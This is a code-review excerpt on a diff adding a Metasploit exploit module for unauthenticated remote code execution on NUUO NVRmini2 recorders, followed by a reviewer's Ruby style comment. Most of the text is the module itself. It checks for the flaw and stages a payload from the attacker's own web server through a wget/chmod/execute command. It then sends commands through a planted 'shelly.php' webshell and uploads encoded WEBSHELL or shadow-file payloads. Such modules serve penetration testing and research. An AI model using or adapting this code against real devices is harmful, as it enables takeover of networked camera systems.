modules/exploits/linux/http/nuuo_nvrmini_unauth_rce_r2.rb

```diff
@@ -0,0 +1,202 @@
+          ['NVRmini2 v2.0.0 and above', {} ],
+          ['NVRmini2 v1.7.6 and below', {} ],
+        ],
+        'DefaultTarget' => 0,
+        'Platform' => 'linux',
+        'Arch' => ARCH_ARMLE,
+        'Privileged' => true,
+        'Stance' => Msf::Exploit::Stance::Aggressive,
+        'DisclosureDate' => '2022-01-12'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'Application path', '/']),
+        OptString.new('SRVHOST', [true, 'IP address for the HTTP server', '0.0.0.0']),
+        OptString.new('SRVPORT', [true, 'Port for the HTTP server', '4445']),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'handle_import_user.php'),
+      'method' => 'GET'
+    })
+    if res && (res.code == 200) && res.body =~ (/There was an error uploading the file/)
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+  # request handler for our web server
+  def on_request_uri(cli, _request)
+    print_status("#{peer} - Sending the payload to the device...")
+    @pl_sent = true
+    send_response(cli, @pl)
+  end
+
+  def payload_prep
+    # payload prep
+    @pl = generate_payload_exe
+    @pl_sent = false
+    resource_uri = '/' + rand_text_alpha(10..15)
+
+    # do not use SSL
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+
+    if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::'))
+      srv_host = Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+
+    service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+    print_status("#{peer} - Starting up our web service on #{service_url} ...")
+    start_service({
+      'Uri' => {
+        'Proc' => proc do |cli, req|
+          on_request_uri(cli, req)
+        end,
+        'Path' => resource_uri
+      }
+    })
+
+    datastore['SSL'] = true if ssl_restore
+    print_status("#{peer} - Asking the device to download and execute #{service_url}")
+
+    filename = rand_text_alpha_lower(rand(2..9))
+    cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &"
+    sleep 3
+    cmd
+  end
+
+  def send_cmd(cmd)
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'shelly.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'cmd' => cmd
+      }
+    })
+    res
+  end
+
+  def exploit
+    # select our target and payload
+    if target == targets[0]
+      payload_enc = Base64.decode64(WEBSHELL)
+    else
+      payload_enc = Base64.decode64(SHADOW)
+    end
+
+    # create post data to be sent to the server
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(rand_text_alpha(5..12),
+                       nil, nil,
+                       content_disposition = 'form-data; name="tmp_name"')
```

Comment:
This initializes the variable `content_disposition` to `'form-data; name="tmp_name"'`, and the variable `content_disposition` isn't used again

```suggestion
                      'form-data; name="tmp_name"')
```

Note that the Python's syntax for keyword arguments doesn't work with Ruby. We need to fix other uses of this in the codebase too